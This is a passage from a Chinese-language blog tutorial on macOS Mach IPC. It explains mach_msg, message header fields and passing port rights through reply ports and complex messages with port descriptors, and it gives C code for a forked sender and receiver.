class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg</span><span class="params">(msg, option, send_size, rcv_size, rcv_name, timeout, notify)</span></span></span><br><span class="line"><span class="function">    <span class="type">mach_msg_header_t</span> *msg</span>;    <span class="comment">// 指向 Mach message 的指针</span></span><br><span class="line">    <span class="type">mach_msg_option_t</span> option;  <span class="comment">// 一些基础标志，例如 MACH_SEND_MSG 或 MACH_RCV_MSG 标志以指定消息是发送还是接收</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span> send_size; <span class="comment">// 待发送的消息长度</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span> rcv_size;  <span class="comment">// 待接收的消息长度</span></span><br><span class="line">    <span class="type">mach_port_t</span> rcv_name;      <span class="comment">// 接收消息的 port </span></span><br><span class="line">    <span class="type">mach_msg_timeout_t</span> timeout;<span class="comment">// 指定 mach_msg 最长等待时间</span></span><br><span class="line">    <span class="type">mach_port_t</span> notify;        <span class="comment">// 一个通知 port，用于接收通知信息</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_send</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">mach_msg</span>(msg, MACH_SEND_MSG,</span><br><span class="line">            msg-&gt;msgh_size, <span class="number">0</span>, MACH_PORT_NULL,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_receive</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">mach_msg</span>(msg, MACH_RCV_MSG,</span><br><span class="line">            <span class="number">0</span>, msg-&gt;msgh_size, msg-&gt;msgh_local_port,</span><br><span class="line">            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>对于发送方而言，发送方需要指定 header 的一些字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>); <span class="comment">// 设置下面对应 port 的 mach 信息类型</span></span><br><span class="line">message.header.msgh_remote_port = port;          <span class="comment">// 设置发送端口为目标 port</span></span><br><span class="line">message.header.msgh_local_port = MACH_PORT_NULL; <span class="comment">// 没有辅助端口</span></span><br><span class="line">message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br></pre></td></tr></table></figure><h3 id="2-双向-mach-通信示例">2. 双向 mach 通信示例</h3><p>上面的例子已经为我们展示了单向 mach 通信的基本方式（<strong>sender-&gt; receiver</strong>）。接下来尝试让<strong>receiver</strong>也能发送数据给<strong>sender</strong>，实现双向通信。</p><p>需要注意的是， mach 是单向通信，因此必须让 <strong>sender 再创建一个新的 port</strong>（即 sender 持有新 mach port，注意此时 receiver 已经持有了一个旧的 mach port），并<strong>让 receiver 持有该 port 的 send right</strong> 才能实现双向通信。而这就涉及到一个问题：<strong>如何传递 mach port right？</strong></p><p>一种解法是，再次利用 bootstrap 做中转，这确实是一个解决方法，但是不够优雅。实际上，因为此时的 sender 是可以通过已有的 mach port 将信息发送给 receiver，因此我们可以<strong>利用这个 mach port ，将新的 mach port 的 send right 发送给 receiver</strong>。</p><p><strong>因为 Mach message 是支持传输 port right 的。</strong></p><p>以下是整个通信的完整过程，其中 bob 是 sender, alice 是 receiver：</p><p><img src="/2021/12/mach_ipc_intro/mach-messages-bidirectional.png" alt="img"></p><p>现在的问题是，如何把权限发送过去？我们分别看看两种不同的方式。</p><h4 id="a-reply-port">a. reply port</h4><h5 id="1-sender">1) sender</h5><p>当 sender 从 bootstrap 中获取到了 receiver mach port 的 send right 后，sender 便可以给 receiver 发送信息。这是之前的 message header 设置方式：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS</span>(<span class="comment">/* remote */</span> MACH_MSG_TYPE_COPY_SEND, <span class="comment">/* local */</span><span class="number">0</span>);</span><br><span class="line">message.header.msgh_remote_port = port;</span><br><span class="line">message.header.msgh_local_port = MACH_PORT_NULL;</span><br></pre></td></tr></table></figure><p>但在这里，我们将使用一个新的 message 方式：</p><ol><li>在 msgh_bits 中额外设置 local port 的 right 为 MACH_MSG_TYPE_MAKE_SEND_ONCE，这会使得<strong>对端只能向该端口发送一次信息</strong>。</li><li>在 msgh_local_port 字段中放入本地自己新建立的 replyPort 端口。</li></ol><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">message.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(</span><br><span class="line">    <span class="comment">/* remote */</span> MACH_MSG_TYPE_COPY_SEND,</span><br><span class="line">    <span class="comment">/* local */</span> MACH_MSG_TYPE_MAKE_SEND_ONCE,</span><br><span class="line">    <span class="comment">/* voucher */</span> <span class="number">0</span>,</span><br><span class="line">    <span class="comment">/* other */</span> <span class="number">0</span>);</span><br><span class="line"><span class="comment">// 注： 上面这条语句等价于 </span></span><br><span class="line"><span class="comment">// message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE);</span></span><br><span class="line"></span><br><span class="line">message.header.msgh_remote_port = port;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 与之前单向通信设置 MACH_PORT_NULL 不同，这里设置了一个 sender 自己创建并带有 send right 的 mach port</span></span><br><span class="line">message.header.msgh_local_port = replyPort; </span><br></pre></td></tr></table></figure><p>那么此时再使用 mach_msg 发送这条 message，则 sender 发送来的信息中将包含一个 replyPort。</p><blockquote><p>这个 replyPort 有什么用呢？事实上，对面的 receiver 将会通过这个传过去的 replyPort，向这边的 sender 发送信息。</p></blockquote><p>注意所设置的 <code>message.header.msgh_bits</code>，其中 <code>local</code> 部分对应的是 <strong>MACH_MSG_TYPE_MAKE_SEND_ONCE</strong>， 这意味着 replyPort 只能被 receiver 使用一次 send 操作。</p><h5 id="2-receiver">2) receiver</h5><p>当 receiver 接收 message 时，sender 发送信息时的 <code>remote_port</code> 和 <code>local_port</code>，分别一一对应于 receiver 所接收到 message 中的 <code>local_port</code> 和 <code>remote_port</code>。</p><p>因此此时 receiver 方的 message 中 <code>remote_port</code>  不会是 MACH_PORT_NULL，而是<strong>先前设置的 <code>replyPort</code></strong>。</p><p>因此接下来 receiver 便可以通过这个 replyPort 向 sender 发送信息。但需要注意的是，在发送信息给 replyPort 时，其 message.header.msgh_bits 字段，必须设置成 <code>MACH_MSG_TYPE_MAKE_SEND_ONCE</code>，即和发送该端口过来时所设置的位一致。</p><p>因为受到发送 replyPort 方（即 sender 方）的设置或者限制， receivier 方只能发送一次信息至 replyPort  中。</p><h5 id="3-代码示例">3) 代码示例</h5><p>以下是完整的代码实现：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 从 bootstrap 中查询并获取一个 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 构造待发送的信息</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m sender.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 新建立一个 receiver 发送的 replyPort</span></span><br><span class="line">    <span class="type">mach_port_t</span> replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;replyPort);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_allocate() created port right name %d\n&quot;</span>, replyPort);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 注意这里，remote port 的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE</span></span><br><span class="line">    send_msg.header.msgh_bits           = <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);</span><br><span class="line">    send_msg.header.msgh_remote_port    = port;</span><br><span class="line">    send_msg.header.msgh_local_port     = replyPort;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = replyPort;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Text: %s | number: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 创建一个带有接收权限的 mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 给该 port 再增加一个发送权限</span></span><br><span class="line">    kr = <span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, port, MACH_MSG_TYPE_MAKE_SEND);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询</span></span><br><span class="line">    kr = <span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 等待 message</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">    kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Text: %s | number: %d | remote_port: %d\n&quot;</span>, recv_msg.recv_content.texts, recv_msg.recv_content.integer, recv_msg.recv_content.header.msgh_remote_port);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_msg_send_t</span> send_msg;</span><br><span class="line">    <span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">    send_msg.integer = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 注意这里的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE</span></span><br><span class="line">    send_msg.header.msgh_bits           = recv_msg.recv_content.header.msgh_bits &amp; MACH_MSGH_BITS_REMOTE_MASK;</span><br><span class="line">    send_msg.header.msgh_remote_port    = recv_msg.recv_content.header.msgh_remote_port;</span><br><span class="line">    send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 将其发送</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (fork() == <span class="number">0</span>)</span><br><span class="line">        <span class="built_in">sender</span>();</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>执行效果：</p><p><img src="/2021/12/mach_ipc_intro/image-20211229213351546.png" alt="image-20211229213351546"></p><p>那么可能会有疑问，为什么 replyPort 的 msg 类型要设置成 MACH_MSG_TYPE_MAKE_<strong>SEND_ONCE</strong>？能不能设置成 MACH_MSG_TYPE_<strong>COPY_SEND</strong> ？实际上是可以的，并且后者可以允许 receiver 多次向 replyPort 发送 mach message，而不是<strong>只有一次</strong>。</p><h4 id="b-complex-message">b. complex message</h4><p>还记得之前描述 Mach Message 的结构么？Mach message 既可以传递简单信息（即之前的那些示例）又可以传递复杂信息（即接下来要讲的）。现在，我们将尝试使用<strong>复杂</strong> mach message 来传递一个通信 mach port。</p><blockquote><p>为了简化说明，这里假设上面的内容已经完全理解。</p></blockquote><h5 id="1-sender-2">1) sender</h5><p>现在， sender 需要尝试将自己新建好的 replyPort（已完成包括 alloc, insert right 等操作） 发给 receiver，那该怎么做呢？</p><p>其实可以直接在<strong>消息主体</strong>中，传递<strong>端口描述符</strong>。这里需要先引入一下待发送的 mach msg 结构类型定义：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">  <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">  <span class="type">mach_msg_port_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br></pre></td></tr></table></figure><p>其中，header 自不必说；<code>msgh_descriptor_count</code> 说明接下来将会有多少个 descriptor；而<code>mach_msg_port_descriptor_t</code> 类型的 descriptor 字段将会描述一些关于待传递 port 的信息。</p><p>每个 <code>descriptor</code> 不管是什么类型，都会占用 40 字节。以下是最原始的 descriptor 的类型声明：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">natural_t</span>                     pad1;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>               pad2;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span>                  pad3 : <span class="number">24</span>;</span><br><span class="line">    <span class="type">mach_msg_descriptor_type_t</span>    type : <span class="number">8</span>;</span><br><span class="line">&#125; <span class="type">mach_msg_type_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>而端口描述符的定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">  <span class="type">mach_port_t</span>                   name;</span><br><span class="line">  <span class="type">mach_msg_size_t</span>               pad1;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span>                  pad2 : <span class="number">16</span>;</span><br><span class="line">  <span class="type">mach_msg_type_name_t</span>          disposition : <span class="number">8</span>;</span><br><span class="line">  <span class="type">mach_msg_descriptor_type_t</span>    type : <span class="number">8</span>;</span><br><span class="line">&#125; <span class="type">mach_msg_port_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>其中</p><ul><li><p><code>name</code>：待传递的 port。这里要设置为 <strong>replyPort</strong></p></li><li><p><code>disposition</code>：待传递 port 的 right。这里设置为 <strong>MACH_MSG_TYPE_PORT_SEND</strong></p><p>一共有以下几种：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> *  Values received/carried in messages.  Tells the receiver what</span></span><br><span class="line"><span class="comment"> *  sort of port right he now has.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *  MACH_MSG_TYPE_PORT_NAME is used to transfer a port name</span></span><br><span class="line"><span class="comment"> *  which should remain uninterpreted by the kernel.  (Port rights</span></span><br><span class="line"><span class="comment"> *  are not transferred, just the port name.)</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_NONE         0</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_NAME         15</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_RECEIVE      MACH_MSG_TYPE_MOVE_RECEIVE</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_SEND         MACH_MSG_TYPE_MOVE_SEND</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_PORT_SEND_ONCE    MACH_MSG_TYPE_MOVE_SEND_ONCE</span></span><br></pre></td></tr></table></figure></li><li><p><code>type</code>：待传递的类型。这里要设置为 <strong>MACH_MSG_PORT_DESCRIPTOR</strong></p><p>由于 descriptor 的类型<strong>不只是端口描述符一种</strong>，因此需要<strong>显式为 descriptor 指定类型</strong>，以便于内核处理。共有以下几种类型：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_PORT_DESCRIPTOR                0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_DESCRIPTOR                 1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_PORTS_DESCRIPTOR           2</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_OOL_VOLATILE_DESCRIPTOR        3</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_GUARDED_PORT_DESCRIPTOR        4</span></span><br></pre></td></tr></table></figure></li></ul><p>代码示例：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">send_msg.msgh_descriptor_count      = <span class="number">1</span>;</span><br><span class="line">send_msg.descriptor.name            = replyPort;</span><br><span class="line">send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;</span><br><span class="line">send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;</span><br></pre></td></tr></table></figure><p>最后执行 mach_msg_send 之前，别忘记向 msgh_bits 字段中添加  MACH_MSGH_BITS_COMPLEX，以指定该信息为<strong>复杂信息</strong>。否则这些描述符只会被解释成<strong>内联信息</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 注意这里，要指定待发送的信息格式为 complex</span></span><br><span class="line">send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br></pre></td></tr></table></figure><h5 id="2-receiver-2">2) receiver</h5><p>接收端只需接收发送端发来的数据，并取出端口描述符中的 port name，即可开始通信。</p><p>要做的事情较为简单：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 等待 message</span></span><br><span class="line"><span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">recv_msg.recv_content.header.msgh_size          = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">recv_msg.recv_content.header.msgh_local_port    = port;</span><br><span class="line">kr = <span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header);</span><br><span class="line"></span><br><span class="line"><span class="type">mach_msg_simple_send_t</span> send_msg;</span><br><span class="line"><span class="built_in">strcpy</span>(send_msg.texts, <span class="string">&quot;Hello, I&#x27;m receiver.&quot;</span>);</span><br><span class="line">send_msg.integer = <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line">send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;</span><br><span class="line">send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;</span><br><span class="line">send_msg.header.msgh_local_port     = MACH_PORT_NULL;</span><br><span class="line">send_msg.header.msgh_size           = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将其发送</span></span><br><span class="line"><span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;send_msg.header);</span><br></pre></td></tr></table></figure><h5 id="3-代码示例-2">3) 代码示例</h5><p>示例代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 